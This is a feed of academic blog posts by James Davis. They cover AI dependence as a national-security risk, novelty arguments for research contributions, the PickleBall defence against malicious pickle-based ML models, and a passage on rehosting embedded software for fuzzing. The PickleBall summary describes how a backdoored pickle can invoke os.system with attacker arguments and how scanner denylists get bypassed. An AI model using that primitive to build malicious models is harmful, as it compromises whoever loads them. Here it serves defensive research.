Stories by James Davis on Medium

Don’t let Generative AI Create Just-In-Time Knowledge Work

James Davis — Thu, 02 Apr 2026 16:48:55 GMT

AI Dependence: The Overlooked Tradeoff Between Economic Prosperity and National Security

America’s AI policy is increasingly organized around a simple idea: adopt AI broadly, build the infrastructure to support it, and train the workforce to use it. The White House AI Action Plan explicitly links national strength to rapid AI adoption, large-scale AI infrastructure, and an AI-ready workforce. The White House’s executive order on Advancing Artificial Intelligence Education for American Youth pushes AI literacy deeper into American education. The Department of Energy’s Genesis Mission treats AI as core national infrastructure for science and innovation, backed in 2026 by a $293 million funding call. OpenAI’s government announcement describes a Defense Department contract with a ceiling of $200 million to prototype frontier-AI uses in administration and cyber defense. Every CEO in the country is emphasizing AI adoption as an existential mandate.

At one level, this is entirely rational. Generative AI is a real productivity technology. The OECD’s 2025 review of experimental evidence finds measurable gains across tasks such as writing, coding, summarization, editing, and customer support, often in the 5% to 25% range depending on the task and setting. Generative AI is an amplifier: it lets capable people work faster and often at a higher level of abstraction.

But the most important question is not whether AI raises productivity. It does. The real question is what kind of national workforce and technical capacity we should build when productivity increasingly depends on AI-mediated abstraction. American policy is not merely encouraging people to use better tools. It is encouraging the country to reorganize more and more knowledge work around a service layer that sits above direct implementation.

We have seen versions of this dynamic before. STEM education has long traded low-level mechanism for leverage. In computing, for example, we stopped expecting most students to think in assembly; many programs moved to C, then Java, and now often Python or JavaScript in introductory courses. Across STEM more broadly, the center of gravity has shifted from direct implementation toward modeling, integration, and evaluation. Generative AI pushes that trend much further. It enables a more radical division of labor, in which technical workers increasingly specify, critique, validate, and assemble work produced by a model rather than producing it directly.

Productivity-First AI Adoption Creates National Fragility

This trend can be enormously valuable for economic prosperity. It also creates a national-security problem. If a country reorganizes STEM education and professional practice around the assumption that the generator is always available, it will produce a workforce that is more productive in normal times but less resilient in crisis. Uncritical AI adoption will move human expertise upward, away from implementation and toward supervision. Yet the underlying AI layer is becoming an increasingly centralized, and therefore a targetable, dependency.

That assumption is much more dangerous for generative AI than it was for older abstraction shifts.

If a nation loses domestic chip fabrication capacity, that is severe, but it is in some sense a manufacturing problem. Existing devices, existing software, and existing human skills do not instantly disappear.
Meanwhile, if a nation loses access to the serving infrastructure for generative AI, the capability itself degrades immediately. The model is not a book on a shelf. It is a live service. It depends on data centers, electrical power, network backbones, cooling systems, and continuous operations at extraordinary scale.

That makes generative AI a new and distinctive foundation for national productivity. It is not just sophisticated software. It is software whose usefulness depends on uninterrupted access to fragile, high-value physical infrastructure. Yes, other infrastructures matter too. But most of them fail locally. A power outage in New York does not stop work in Los Angeles. A failure at a dominant AI provider can break workflows across the entire country at once. That is a different kind of dependency: not merely critical, but centralized enough to create nationwide common-mode failure.

What’s the worst that could happen?

The vulnerability becomes clearer when we imagine a few serious disruptions. One possibility is physical loss of service. A severe space-weather event, a successful cyber-physical attack on data centers or transmission infrastructure, or a strike on major network chokepoints could make it impossible to serve large models at scale across industry, research, and government. In that world, AI dependence looks like a straightforward infrastructure problem: the layer on which productivity relied is simply gone.

But a more dangerous case may be partial failure rather than complete failure. Suppose the systems still run, but the models have been poisoned, degraded, or otherwise made subtly unreliable. They may become slightly more error-prone, biased in ways that are hard to notice, or systematically weak on exactly the classes of tasks that matter most. A degraded but still plausible system is harder to detect and therefore more dangerous. It can quietly contaminate work at scale, especially if the surrounding workforce has lost too much of the underlying expertise needed to identify and correct the errors.

The models are gone and no one remembers what to do

What happens then? If generative AI has become the substrate for engineering work, then disabling or degrading the GenAI serving layer does not merely make us less efficient. It exposes a deeper national vulnerability: a generation of highly productive professionals who were trained to operate one or two abstraction layers higher, but who no longer know how to drop down when the abstraction disappears.

Economic logic says to let people work at the highest-leverage layer available. Of course it does. If AI lets one engineer do the work of several, or lets a scientist move faster from question to prototype, then broad adoption should raise output. The White House and DOE are not irrational for wanting that. They are responding to a genuine competitive opportunity.

But security logic asserts that a nation must be able to function when its highest-leverage layer fails. A country can rationally decide that many workers need not understand transistor physics, compiler internals, or even much programming-language syntax for day-to-day prosperity. But it cannot rationally allow all implementation competence to atrophy while simultaneously moving essential work onto infrastructure that is centralized, power-hungry, network-dependent, and physically targetable.

How do we balance these aims? AI adoption must be paired with the deliberate preservation of fallback competence. In STEM education, we should be very careful before treating implementation knowledge as obsolete. Generative AI invites us to move one layer higher: away from directly carrying out technical work and toward specifying, critiquing, and validating it. But our students must still understand the mechanisms, constraints, and failure modes beneath the AI layer, all the way down the engineering stack. When the models are available, abstraction is a source of leverage. When the models fail, abstraction becomes a trap. A prosperous nation may choose to educate many STEM workers at a higher level of abstraction. A secure nation must also ensure that enough of them can still work without it.

COVID-19 already gave us a clear example of what happens when we forget to consider resilience. Between 1990 and 2020, humans built a highly optimized global supply chain: lean inventories, just-in-time delivery, tight coupling across continents, and very little slack. In normal times, that system delivered prosperity through efficiency. In crisis, it delivered shortages, delays, and strategic vulnerability. Generative AI offers the same kind of bargain for knowledge work. It makes professionals dramatically more productive under normal conditions. But if we build our national productivity model around the assumption of always-available AI service, then we are doing for cognitive labor what just-in-time logistics did for physical goods: removing slack, redundancy, and fallback capacity in the name of efficiency. That is not resilient prosperity. It is just-in-time knowledge work.

What then shall we do?

This is a complex problem, and I don’t know the solution. I do have some ideas, though.

First, industry and government must recognize and reward deep expertise. They currently reward productivity, and productivity has, until now, been a reasonable proxy for expertise. Generative AI (at least when it’s working!) has decoupled them. A worker can now produce impressive output by leaning on a system whose underlying mechanisms they do not understand. That is economically useful, but it is not the same thing as mastery. Certifications, hiring standards, promotion criteria, and compensation structures should be careful not to collapse the distinction. A society that stops rewarding people who can still operate below the GenAI abstraction layer will eventually discover that it has too few of them.
Second, university engineering education may need a third track. At the moment, in the United States, we largely have two broad models: associate’s degrees, which often emphasize practical workforce preparation, and bachelor’s degrees, which typically aim for a deeper and broader professional formation. Generative AI may force a sharper distinction within technical education itself. One track might optimize for high-leverage AI use in ordinary practice: specifying, orchestrating, validating, and integrating. Another must deliberately preserve deeper implementation capability: the ability to work close to the mechanism, reason from first principles, and reconstruct capability when the higher layer fails. Perhaps that means more five-year degree programs, or new kinds of majors, concentrations, and professional credentials. I do not know the right institutional form. But preserving this deeper layer of technical competence should become a national priority. We should also say so plainly to students: overreliance on generative AI can make you more productive while also making you less capable. Formalizing that distinction through degree structures may help communicate the point. Right now, all most faculty can do is ask students not to become dependent on a system the country is simultaneously telling them to depend on. That is a contradiction, not a strategy.
Third, AI Dependence should be regulated the way other systemic dependencies are regulated. Companies optimize for good times. Regulators mandate enough inefficiency to survive bad times. We do not let banks maximize short-term return by lending without limit. We require capital reserves and stress tests because a bank optimized only for good times becomes dangerous in bad times. The same logic applies here: an organization that shifts too much of its operational competence onto generative AI becomes highly efficient under normal conditions, but fragile under disruption. A national regulatory framework could therefore require some organizations — critical firms, national labs, the Department of Defense, and similar actors — to demonstrate a sub-GenAI competency reserve: a real, exercised ability to continue essential operations when AI service is degraded, unavailable, or untrustworthy. These organizations should also be stress tested under simulated model outages or severe service degradation to verify that they can still perform critical functions in degraded mode. The goal is not to make the USA AI-independent, but to prevent critical organizations from becoming AI-insolvent.

Conclusion

I am not arguing against the adoption of generative AI. The productivity gains are real, and it would be foolish for firms, universities, and governments to ignore them. A country that refused to use a technology with clear leverage effects on writing, coding, design, analysis, and scientific work would be choosing self-imposed decline. That is why the present national push toward AI adoption is so easy to understand. It promises more output, faster iteration, and a higher level of abstraction for an enormous share of knowledge work. But productivity is not the only national objective! Resilience matters too. A system that is optimized only for performance in normal conditions becomes brittle under disruption. If generative AI becomes the default substrate for technical and professional work, then the United States may gain economic speed while also increasing strategic fragility. Our national capability may come to depend on a centralized service layer that many institutions no longer know how to do without.

That is what I mean by AI Dependence. It overlaps with other forms of dependence, but it is not reducible to any one of them. It is not just dependence on the Internet, though internet failure is one way the risk may manifest. It is not just dependence on cloud providers, though provider concentration is part of the problem. It is not just worker overreliance on convenience tools, though that matters as well. It is a broader sociotechnical condition in which productivity, expertise, and institutional practice are reorganized around the assumption that a small number of AI systems will remain continuously available, trustworthy, and effective.

I like the productivity. I do not like the risk. A serious national AI strategy should admit that these two facts come together. If we want the prosperity that generative AI may help create, then we should also invest deliberately in the human competence, institutional slack, and fallback capacity needed to survive the day that the AI layer fails.

Postscript

One objection to this argument is that it merely redescribes a strike on key internet nodes, data centers, or power infrastructure. That objection is partly right, but not right enough. AI Dependence certainly includes those scenarios, because generative AI is delivered through physical infrastructure and networked service. If major internet chokepoints or cloud regions fail, AI-dependent work will fail with them.

But the construct of AI Dependence is broader than that. The same strategic vulnerability can arise even when the internet remains up. A dominant model provider may suffer a serious outage. A model may be quietly poisoned, degraded, or made unreliable in ways that are difficult to detect. Access policies may change. Costs may spike. A workforce may become so accustomed to operating at the AI layer that it can no longer recover lower-level capability quickly, even when the underlying hardware and networks are intact. In other words, a strike on key infrastructure is one possible mechanism of failure. It is not the whole phenomenon.

That is why I think AI Dependence is worth naming as its own construct. It captures not merely the physical vulnerability of AI systems, but also the institutional and educational vulnerability created when a society reorganizes expertise around them. We should want the economic upside of generative AI. But we should be honest that this upside may come with a new national exposure: not just the loss of a tool, but the loss of a layer on which too much work has come to depend.

Different Contributions Require Different Novelty Arguments

James Davis — Fri, 27 Mar 2026 18:20:40 GMT

This is another post in my series of capturing conversations I've had with graduate students that contain some kernel of insight I thought might be useful to share with the rest of the world.

The just-so story of research novelty

We often teach novice researchers a simple story about novelty: survey the literature, find a gap, fill it, and you have a paper. This is a “just-so story” that works well to introduce the research process. This paradigm is presented in books like “The Craft of Research” and myriad seminars for undergraduates and first year graduate students. But it is a simplification of research reality.

Different kinds of contributions require different novelty arguments, and the “gap in the literature” argument fits some of them better than others.

Three kinds of contributions and their novelty arguments

Here is a rough taxonomy. The paradigm applies to the first two, and not the third.

Type One: Explanatory Contributions. In software engineering, an explanatory contribution seeks to account for patterns in practice by identifying the factors and relationships that help explain them. These contributions do not merely report observations; they synthesize evidence into an account of why some engineering behavior occurs, what shapes it, and under what conditions it changes. For example, in our lab’s work on software signing, our S&P’24 measurement study provided evidence (a Type-2 contribution) that signing adoption and signature quality vary substantially across software package registries, and that factors such as registry policy and tooling appear to matter more than public security events alone. Building on that evidence, our later interview and usability studies moved toward explanation: in a 2025 USENIX Security paper, we develop a refined model of software-signing practice and identify technical, organizational, and human challenges affecting adoption and use in industry, and our follow-up USENIX Security’26 paper explains how usability factors, organizational context, and deployment setting shape the adoption of next-generation signing tools such as Sigstore. Explanatory contributions in software engineering often emerge by interpreting prior empirical results and turning them into a more general account of the forces that govern engineering practice.
Type Two: Evidence-Building Contributions. In software engineering, an evidence-building contribution tests claims about software practices, tools, or techniques by collecting and analyzing data. Sometimes the goal is to evaluate predictions suggested by prior ideas; other times the goal is to produce the first rigorous evidence about an understudied practice. For example, in our ICSE 2026 paper on unit proofing for memory safety verification, the contribution is not a new verification theory, but empirical evidence about the effectiveness, cost, and characteristics of a verification practice that had previously lacked systematic evaluation. The paper presents the first empirical study of unit proofing for memory safety verification, reporting defect-detection rates, development costs, execution times, and other practical findings that can inform both engineering adoption and future research. If the literature does not yet contain the necessary evidence to evaluate a practice or claim, then that missing evidence is a legitimate gap that an empirical software engineering paper can fill.
Type Three: Capability Development. In software engineering, a capability-building contribution gives practitioners or researchers a way to do something they could not previously do except through expensive, manual, or poorly scalable effort. The novelty argument is therefore not simply “no one has published this before,” but rather “this task was not previously achievable in a practical way using routine means.” Our ASE 2024 paper, FAIL, is an example. Prior work had shown that software failures reported in the news can be valuable for engineering analysis, but existing approaches relied largely on manual study. FAIL contributes a new capability: an automated pipeline that searches, filters, merges, and analyzes failure reports from the news, enabling large-scale analysis of thousands of incidents at modest cost. During the rebuttal process, we sharpened this point: the contribution was a systems design and implementation that automated a previously manual activity and made ongoing large-scale failure analysis feasible. The central question of the paper was not whether LLMs are themselves new, but whether combining them into this pipeline yielded a nontrivial and useful new capability for software engineering.

I think Types One and Two are relatively straightforward to understand, so I won’t talk about them anymore. I do not mean that they are simple, but rather that their criteria are understandable. Let’s talk more about Type Three.

I heard once a representative from the US Defense Advanced Research Projects Agency (DARPA) describe Type-Three contributions like this: "Can we solve this with five guys, one year, and elbow grease?" If a problem can be solved by five guys combining existing techniques and some elbow grease, then it probably does not justify a research paper. This is true whether or not there is a paper in the scholarly literature describing the solution. And here is the key difference from the earlier types that I described. For engineering research, the bar is not "Is it in the literature?", but rather “Is it possible through a straightforward application of the state-of-the-art methods?”

Guidance for Conducting Type Three, Capability-Developing Research

If you are proposing to develop a new capability, then a Type Three contribution places quite a high burden on you. The novelty claim cannot rest solely on being the first to build a capability. You must also show that it was not previously achieveable through routine means.

You must therefore construct, to the best of your ability as a practitioner of the art, the best solution(s) to the problem that use current knowledge. You must master not only the research literature from your own field, but also the literature from adjacent fields, as well as techniques in the patent literature, commercial products, and artifacts from "the Internet" (open-source software, blog posts, and so on). If you can construct such a solution without inventing anything new, then you have a pickle — you have built a new thing that did not previously exist, but its novelty is in the composition of existing techniques rather than in the development of a new technique.

Here is another way to think about it. If you want to claim a new capability, you must construe the idea of “prior art” broadly, because your competitors are not only the researchers who happen to have worked on this problem before, but also a well-informed engineer with a can-do attitude. That is why novelty arguments for capability-building work are often broader and more demanding than novelty arguments for Type One (explanatory) or Type Two (evidence-building) work.

If you are planning Type Three research, here are some questions you can ask yourself to structure your effort and articulate your results:

Why is this hard? Is the capability already achievable in practice with known methods? If not, what specific obstacle blocks routine composition?
What is your “secret sauce”? What is the nature of the insight needed to obtain the new capability? Does this work introduce a new method, a non-obvious integration principle, or strong evidence that changes what practitioners can reliably do?
What are the limits of your approach? How general is the insight? What are the related problems to which it is applicable, and what are the essential limits of the technique?

Closing remarks

A useful analogy comes from patent law, which asks whether an invention is useful, novel, and non-obvious. Capability-building papers face a similar challenge. Reviewers will rarely dispute utility if the system works, and they may grant that you are first to solve the problem. The harder question is whether the solution required genuine insight, rather than the routine composition of known techniques.

I think capability-building research is exciting. You show people how to solve a real problem, or how to complete their tasks much more quickly, with less memory, more securely, in a more energy-efficient way, etc. It’s amazing to help make the world a better place. But it’s hard to publish it if the novelty argument is vague. So here is the rule: to publish capability-building research, you must show that the capability was not previously achievable through routine means, and clarify the insight that made it possible.

PickleBall: Secure Deserialization of Pickle-based Machine Learning Models

James Davis — Mon, 24 Nov 2025 22:25:18 GMT

This blog post summarizes our work “PickleBall: Secure Deserialization of
Pickle-based Machine Learning Models”, which appeared at the 2025 ACM
Conference on Computer and Communications Security (CCS’25). The work was the result of collaboration between groups at Columbia, Brown, Purdue, Google, and Technion. The published paper is here and is open-access (no paywall). An extended version is available on arXiv, here.

This post was by the lead author, Andreas Kellas, with light editing from me.

Summary

Machine learning models are shared and reused in the open model ecosystem. Just like in conventional software (“software supply chain attacks”), attackers want to gain unauthorized access to computing systems by sharing compromised models. So far, attackers have been targeting the serialization format that encodes the models, and inject executable code that gets triggered during the model loading process (deserialization).

In this work, we study the Hugging Face open model ecosystem and specifically focus on the Pickle model format. We design and implement PickleBall, a system for securely loading pickle-based models. Our evaluation shows that PickleBall prevents all known malicious models from loading, while loading more benign models than other secure solutions.

Our contributions are:

A study of the model serialization formats in the Hugging Face ecosystem and of the prevalence of pickle;
The PickleBall system for securely loading pickle models with library-specific loading policies; and
A dataset of over 300 benign and malicious pickle models and programs for evaluating pickle-security solutions.

Background: Insecure Pickle Model Loading

The growing ecosystem of pre-trained ML models enables machine-learning engineers to routinely download and load models from public hubs like the Hugging Face Model Hub. The model supply chain has similar risks to the traditional software supply-chain. Malicious actors can abuse this by uploading backdoored models.

Backdoored models can appear in two forms:

Weights-based backdoors, where the malicious actor intends to compromise the inference result of a model; and
Code-execution backdoors, where the malicious actor intends to compromise the system that loads and uses the model.

This work focuses on preventing the second class: code-execution backdoors.

Code-execution backdoors abuse the model saving and loading process, which differs based on the selected model serialization format. Models are saved using one of many serialization formats, each with its own advantages and disadvantages. Almost all malicious models discovered to date on Hugging Face use the pickle format, which is Python’s native serialization format and stands out for being extremely expressive. Attackers abuse this expressivity to create backdoored models that execute malicious code when the model is loaded.

The expressivity, and the risk, of the pickle format comes from its intertwining of code and data. When the pickle module serializes a Python object, it encodes the objects as a sequence of opcode instructions. During deserialization, these instructions are executed by a virtual machine (the “Pickle Machine”) to reinstantiate the object. In order to instantiate complex Python objects, like models, the Pickle Machine permits some opcodes to import arbitrary Python callables (functions or classes), and to invoke Python callables. This intertwining gives attackers a very straightforward primitive to execute code when the pickle program executes (i.e., is deserialized): for example, by creating a pickle program that imports and invokes `os.system` with attacker-controlled arguments.

The insecurity of pickle loading is a well-known problem, and the ML engineering community has come up with a few different security approaches:

Less expressive model formats are recommended instead of the pickle
format. The SafeTensors format is one example secure alternative to pickle. Rather than permitting code in the serialized representation, it only encodes the data that represents the model weights and parameters.
Model scanners analyze the model to detect if the model is malicious,
usually by applying a denylist of suspected malicious callables. Platforms like Hugging Face integrate model scanners so that anytime a model is uploaded, it is scanned for malware. In practice, these denylists are necessarily incomplete and can be bypassed.
Restricted loaders are custom implementations of the Pickle Machine that prevent the PM from accessing any callables outside of limited allowlists. The prime example is the PyTorch Weights-Only Unpickler which is enabled by default in PyTorch v2.6 and later. The Weights-Only Unpickler uses a default allowlist that permits only a few callables that are safe, primarily from the PyTorch library. Models that use other callables cannot be loaded with this policy.

Is Pickle Serialization (still) a Problem in 2025? Some Measurements

Given the state of pickle model security, we began with two questions:

With alternate model formats available, is the risky pickle format still widely used in the model ecosystem?
Are the existing security solutions sufficient to protect pickle model loading?

To answer these questions, we conducted a longitudinal study of the Hugging Face Model Hub over a period of ~2 years (January 2023 — March 2025). We measured the download rates and model formats of all repositories with more than 1,000 monthly downloads.

The next figure shows the results — we’ll describe them next.

A longitudinal analysis of Hugging Face model formats for repositories with at least 1000 monthly downloads. Repositories can contain multiple models, each in different formats. Each color groups repositories by the model formats they contain: at least one pickle model (green), exclusively pickle (red), and exclusively SafeTensors (blue). Solid lines refer to the number of repositories (left y-axis) and dashed lines track downloads (right y-axis).

The red lines show that many important models continue to use only the pickle format, and these pickle-only models are downloaded 400M+ times per month. The green lines show that repositories containing both pickle and SafeTensors versions of models are also increasingly downloaded, with 1.70 billion monthly downloads. When models are converted to the SafeTensors format, the associated pickle model is often kept for legacy purposes and can still present security risks

We found that pickle model downloads are increasing despite the availability of other model formats. In the final month of our study, repositories with pickle models were downloaded 2.1 billion times, up from 500 million in the first month of the study.

After this measurement, we then sampled models from the study to determine whether they could be loaded by the PyTorch Weights-Only Unpickler. We found that from the ~1500 most downloaded repositories, 15% contained pickle models that could not be loaded by the Weights-Only Unpickler because they used disallowed callables.

To sum up: pickle models are still very prevalent in the Hugging Face ecosystem, and the existing Weights-Only Unpickler solution is not always usable. Model users are at risk and lack a security solution for their needs.

PickleBall Design and Implementation

Goals

To address the pickle model security gap, we set out to create a system for safe pickle model loading. We specifically wanted to prevent the adversary who creates malicious pickle-based models by importing and invoking callables.

The system is required to prevent malicious models from executing unneeded callables, while permitting benign models to use callables that they need to load. The system should prioritize security: it should block all malicious models, while improving usability by loading more benign models without any user intervention than do the existing approaches.

We decided to achieve security and usability with context-specific loading policies, rather than applying one-size-fits-all allow- and deny-lists like previous solutions do.

Intuition

A security-conscious model user might ask: “Are the callables used by this model necessary to load the model?” If they are not, the user should not want the callables to be accessible during loading, lest they be used maliciously. We need a way to determine which callables are “necessary”.

To help make that determination, we observe that machine learning libraries are the interface between model saving and model loading programs, which gives us an opportunity to infer a model’s expected behaviors. When a user wants to use a model, they need to select an appropriate library API to load the model. The libraries provide APIs for loading and saving the model, as well as providing the class definition of the model type, which includes methods for tasks like inference.

For example, if the user believes a model is a flairmodel, they need to use the flair library to load the model and interact with it. The serialized model should encode an instance of the flair model class. A backdoored model might appear to be a flair model, but also include additional malicious callables. However, if we know the callables needed to load any valid flair model, we prevent any other callables from being accessible during loading.

This concept does not preclude malware — if an attacker can cook up an exploit that leverages only the callables of flair models (e.g., through the combination of these interpreted as gadgets), then they can still exploit the system.

Approach

We applied this intuition to realize our PickleBall system. PickleBall applies a common security analysis pattern: it uses static analysis to generate a security policy, and enforces the policy at runtime. PickleBall specializes this pattern to the machine learning setting for loading pickle models, and its implementation must overcome specific key challenges, including the difficulty of statically analyzing dynamic Python code.

PickleBall works in two phases: (1) policy generation, and (2) policy enforcement to enable secure model loading. During policy generation, PickleBall takes as input the source code of a ML library and a class definition to analyze, and outputs a policy of allowed imports and invocations. During safe model loading, PickleBall enforces the extracted policy to protect the loading process. The loading application specifies the policy to enforce, based on the expected class of the model, and begins loading the model with the library API. The loading application can trust that any invocations of the Pickle Machine will be restricted to the configured policy.

PickleBall generates library-specific security policies. It first analyzes the (Python) library code to generate a policy for loading models with that library. When a user loads a model with the library API, PickleBall enforces the policy and either returns the deserialized model object, or else raises a security exception.

Policy Generation: PickleBall’s policy for a given library is meant to contain all of the callables needed to load a valid model produced by the library. PickleBall creates the policy by statically analyzing the Python class definition of the model type in the library, and by identifying all callables needed to instantiate an object of that type in a pickle program.

Because of the difficulty of statically analyzing dynamic Python code, PickleBall’s policies can include more callables than needed, and might also exclude some callables needed by valid models:

To mitigate the security impact of allowing more callables than necessary, PickleBall separates policies into allowed imports and allowed invocations. A callable on the allowed imports list is permitted in opcodes that import callables, and then can be used as a constructor. A callable can only be invoked when is also on the allowed invocations list.
To mitigate the usability impact of excluding callables, PickleBall’s enforcement module applies lazy enforcement, described next.

Policy enforcement: PickleBall enforces a library’s policy at model-load time. PickleBall’s enforcement module is a modified version of the Python pickle module. We modified the opcodes that import and invoke callables to check the policy, and to raise security exceptions. This ensures that a model can only import and invoke callables when they are permitted by the policy.

Due to limitations in static policy generation, PickleBall policies might exclude some valid callables. In a straightforward implementation, this will raise a security exception anytime a benign model imported one of these excluded callables, even if it is not used. However, we observed a pattern in some models: some callables are included in the model as metadata during training, but are not used during model loading or inference. For a user that only wants to use the model for inference, these callables should be ignored and not prevent the entire model loading process to fail.

To address this behavior, we implemented lazy policy enforcement: when a pickle program tries to import a disallowed callable, the security exception is not raised immediately. Instead, a stub object is created to track the disallowed callable, and the security exception is only raised when the stub object is accessed or invoked. This lets the model loading process conclude even when disallowed callables are imported but never used. This method does not compromise security, because the disallowed callable is not actually imported — only the stub object is created.

Evaluation

Dataset

We constructed a dataset composed of:

16 libraries with pickle model loading APIs, to validate the generality of our library-based policy approach;
252 benign models that are each produced by one of these libraries; and
84 malicious models and pickle programs. The malicious models aim to represent all known techniques used to create malicious models, and are sourced from previous work that disclosed malicious models hosted on Hugging Face. We supplemented them with synthetic models that we created when we identified (and disclosed) gaps in existing model scanners.

We generated policies for all 16 libraries in the dataset, and used these policies when loading the benign and malicious models to measure PickleBall’s effectiveness.

We highlight the main results of the evaluation below. Please see our paper for a full description of our evaluation setup and results.

Q1: How well does PickleBall block malicious models from executing their payloads, and correctly load benign models?

For each of the 16 libraries, we measured whether the generated policy permits loading of the associated malicious models in our dataset. We attempted to load each malicious model with the corresponding policy, and found that each PickleBall policy blocks the corresponding malicious model in the dataset.

So far so good — but does Pickleball simply block all models? That sure wouldn’t be very useful!

For each of the generated policies, we attempted to load and use the benign models in our dataset that were associated with the library. PickleBall successfully loaded and performed an inference task on ~80% of the benign models in the dataset.

In question two, we measure overhead to see how much it costs to obtain this result. In question 3, we compare PickleBall’s result to competing techniques.

Q2: What is PickleBall’s runtime overhead?

We measured PickleBall’s runtime performance when generating policies (first figure) and when enforcing policies (second figure).

PickleBall is able to generate all policies for the libraries in the dataset in
less than 30 seconds, with a median of 14 seconds. Policies need to be generated once per library, and updated when the library version is updated. These runtime results are therefore reasonable for integrating into a library release process, or part of a user’s workflow when updated the library version installed on a system.

Time to generate a policy for each library class in dataset (averaged over 3 runs). This is a one-time step that can be integrated into existing workflows — either by library maintainers in the library’s release process, or by a user, prior to loading the model.

While enforcing the policies, PickleBall incurs a median runtime overhead of 0.42ms compared to the regular Pickle Machine, representing a 1.75% increase. This cost is minimal, and is of course dominated by the subsequent cost of training or inference with the model once you’ve loaded it.

Time spent executing pickle.load in test loading program, with and without PickleBall (averaged over 3 runs after 1 warmup run). PickleBall incurs a median runtime overhead of 1.75% and average runtime overhead of 2.62%.

Q3: How does PickleBall compare to existing techniques?

Finally, we compared PickleBall’s secure model loading performance to three state-of-the-art tools:

ModelScan: an open-source static model scanner developed by ProtectAI and integrated into Hugging Face’s platform as of 2025.
ModelTracer: a dynamic model scanner developed by Casey et al. that traces a model’s loading behavior to identify malicious behavior.
Weights-Only Unpickler: the restricted loader enabled by default in PyTorch v2.6 and onward.

In total, we evaluated two model scanners (ModelScan, ModelTracer) and two restricted loaders (PickleBall, Weights-Only Unpickler).

The next table shows our results. We found that the model scanners are both bypassed by some malicious models in the dataset, while PickleBall and the Weights-Only Unpickler are not. The two restricted loaders achieve their security goals by blocking all malicious models.

Comparing PickleBall to the other restricted loader, the Weights-Only Unpickler, we found that PickleBall is able to load 44 more benign models, representing ~17% of the benign models in the dataset. This makes PickleBall a more usable security solution.

The model scanners were bypassed by some malicious models in the dataset. PickleBall and the Weights-Only Unpickler both blocked all malicious models, and PickleBall was able to load more benign models.

Conclusion

In this post, we provided an overview of our work, “PickleBall: Secure Deserialization of Pickle-based Machine Learning Models”. PickleBall provides a secure approach for loading pickle-based machine learning models with library-specific loading policies.

We’ve shown that pickle-based models are still prevalent in the ML ecosystem, and introduced PickleBall, a system whose policies block all malicious models in our dataset while loading more benign models that the other existing secure solution.

Nothing is perfect, though. PickleBall (and other restricted loaders like the Weights-Only Unpickler) do not guarantee that the allowed callables cannot still be used maliciously. An interesting direction of future work is to determine whether callables permitted in an allowlist could be used as gadgets in malicious payloads, analogously to gadgets in code reuse attacks.

Resources

To learn more about PickleBall, please see the following resources:

Official PickleBall Publication: https://dl.acm.org/doi/10.1145/3719027.3765037
PickleBall Extended Report (Pre-print including appendices): https://arxiv.org/abs/2508.15987
PickleBall Source Code: https://github.com/columbia/pickleball
PickleBall Artifact (including Datasets): https://zenodo.org/records/16974645

LEMIX: Enabling Testing of Embedded Applications as Linux Applications

James Davis — Tue, 02 Sep 2025 15:27:12 GMT

This blog post summarizes our recent work, “LEMIX: Enabling Testing of Embedded Applications as Linux Applications”, which appeared at the 2025 USENIX Security Symposium (USENIX Security’25). This work was done in collaboration with Profs. Aravind Machiry and Antonio Bianchi and a team of students, led by Sai Ritvik Tanksalkar. This post was written by Ritvik, with some light editing. You can find the preprint of the full paper here.

Summary

Embedded software runs on over 50 billion devices, yet much of it is written in memory-unsafe languages like C/C++, with nearly 2,000 embedded CVEs reported annually. Rehosting is a technique that enables executing embedded code without hardware, which is essential for testing. However, traditional emulation struggles with hardware diversity. Our analysis of 71 memory corruption CVEs across major RTOSes shows that 85% can be triggered with low-fidelity execution. Motivated by this, we present LEMIX, a framework that rehosts embedded applications as x86 Linux executables (LEAPPs), enabling dynamic analysis without emulation. We address key challenges including preserving execution semantics, while handling peripherals and supporting fuzzing-based testing.

Our contributions are:

Introduced LEMIX, an extensible framework to rehost embedded applications as x86 Linux executables (LEAPPs) without using emulation or physical hardware.
Developed novel analyses for preserving execution semantics, retargeting ISA-specific code, and modeling peripheral interactions; also enhanced testing and code coverage.
Evaluated on 18 applications across 4 RTOSes, uncovering 21 previously unknown bugs, most of which are confirmed and fixed by vendors.
Demonstrated superior code coverage and bug-finding capability over existing state-of-the-art approaches.

Background & Motivation

With the growing diversity of embedded software, creating accurate emulation models for each platform is becoming increasingly impractical. Existing state-of-the-art tools like Multifuzz, Fuzzware, and HALucinator rely on external emulators (e.g., QEMU) to rehost and test embedded applications. However, our study shows that faithfully replicating every instruction as on real hardware is often unnecessary. Most bugs can be triggered with “just enough” fidelity, which we define as Bug Manifestation Fidelity (BMF): the minimum execution fidelity required to trigger bugs of a particular class.

As an example, consider tud_msc_read10_cb, shown below. Executing this function requires the scheduler to run, which only depends on clock behavior. LEMIX achieves BMF by executing the application, handling MMIO (e.g., returning fuzzed data on reads, ignoring writes), and detecting memory safety violations all without modeling peripherals in detail.

Lack of bounds checking on the offset allows an out-of-bounds read from mac_disk[lba], potentially leading to information disclosure or undefined behavior. Note that this code snippet — although taken from an embedded code base — contains a conventional memory safety error that can be detected without knowledge nor emulation of the underlying hardware.

To formalize this concept, we break down Execution Fidelity (EF) into four components:

Language Semantic Fidelity (S): Preserving high-level program behavior such as control flow and data types.
Assembly Execution Fidelity (A): Correct execution of ISA-level instructions.
Peripheral Handling Fidelity (P): Handling of memory-mapped I/O and peripheral interactions.
Clock Fidelity (C): Accuracy of timing behavior, including interrupts and system clock.

EF is expressed as a tuple , with each component rated as Low (L), Medium (M), or High (H).

LEMIX in contrast to existing rehosting approaches.

Our empirical study of 71 memory corruption CVEs revealed that most can be triggered with a fidelity of , i.e., High semantic fidelity, low Assembly execution fidelity, and Medium Peripheral and Clock fidelity. We design LEMIX to target this parameterization of fidelity. Unlike emulator-heavy approaches, LEMIX rehosts embedded applications as x86 Linux binaries, enabling dynamic analysis without requiring full hardware modeling.

Challenges and Approach

We set out to design a generic technique that caters to various RTOSes, architectures, and peripherals. This involved tackling several challenges. The next figure gives an overview of the LEMIX approach.

On the left is the architecture of a “Type-2” (i.e., RTOS-based) embedded system. LEMIX provides mostly-automated porting to produce a comparable Linux-based application. That approach enables the application of off-the-shelf program validation tools such as fuzzers.

Challenge 1: Preserving Execution Semantics

Unlike Linux applications, which typically follow a single-threaded model, embedded applications are designed as event-driven, multithreaded systems. To enable portability across different microcontrollers, embedded RTOSes often include a portability layer that abstracts core RTOS concepts. For example, POSIX-based layers model tasks as pthreads, interrupts as signals, and so on, preserving the semantic behavior of the original application. This is precisely what LEMIX leverages. However, directly swapping in POSIX equivalents for RTOS components often causes integration issues due to application-specific configurations or missing peripheral models.

